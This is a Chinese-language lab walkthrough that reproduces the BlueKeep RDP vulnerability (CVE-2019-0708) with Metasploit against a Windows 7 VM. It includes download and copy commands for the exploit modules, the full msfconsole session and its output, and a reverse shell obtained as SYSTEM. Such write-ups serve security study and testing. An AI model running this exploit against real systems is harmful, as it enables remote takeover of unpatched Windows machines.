CVE_2019_0708复现-基于MSF

Contents

1. 配置环境
2. 攻击

解决无法导入模块和蓝屏问题(目前仅win7_ultimeate_sp1复现成功，其他版本win7和08均蓝屏)

被该漏洞刷屏了，但是实际测试后发现其与ms17010不可同日而语，利用的限制性条件比较多，可以成功利用的版本比较少，期待该exp开发者大佬，继续开发出更多的targets

配置环境

靶机环境:

cn_windows_7_ultimate_with_sp1_x64

(测试本版本可以成功复现获取shell，其他版本蓝屏) 将其设置为 2h 2g

1568076961343

msf exp下载及文件复制

#/bin/bash
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

mkdir -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp_scanner.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

windows7环境配置

将win7打开远程桌面，并且关闭防火墙

1568076933217

msf 加载exp

root@kali:~# msfconsole
msf > reload_all
[*] Reloading modules from all module paths...
[-] WARNING! The following modules could not be loaded!
[-] 	/usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bulekeep_rce.rb: NameError uninitialized constant Msf::Exploit::Remote::RDP
[-] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb: NameError uninitialized constant Msf::Exploit::Remote::RDP
[-] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb: NameError uninitialized constant Msf::Exploit::Remote::RDP
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


       =[ metasploit v4.16.48-dev                         ]
+ -- --=[ 1749 exploits - 1001 auxiliary - 302 post       ]
+ -- --=[ 536 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

出现了WARNING! The following modules could not be loaded!错误，提示我们新加入的模块无法被加载

百度后发现，对此问题的解决非常少，猜测可能是版本问题，将kali重新安装到最新的2019.03后该问题没有再次出现

攻击

root@kali:~# msfconsole
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.244.147rhosts => 192.168.244.147
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS           192.168.244.147  yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

[*] Started reverse TCP handler on 192.168.244.145:4444 
[*] 192.168.244.147:3389  - Detected RDP on 192.168.244.147:3389  (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.244.147:3389  - The target is vulnerable.
[*] 192.168.244.147:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.244.147:3389 - Surfing channels ...
[*] 192.168.244.147:3389 - Lobbing eggs ...
[*] 192.168.244.147:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 1 opened (192.168.244.145:4444 -> 192.168.244.147:49160) at 2019-09-09 20:59:20 -0400



C:\Windows\system32>whoami 
whoami
nt authority\system

C:\Windows\system32>

利用成功

1568077327778

其中target参数如下

Available targets:
  Id  Name
  --  ----
  0   Automatic targeting via fingerprinting
  1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
  2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
  3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
  4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

根据需要进行选择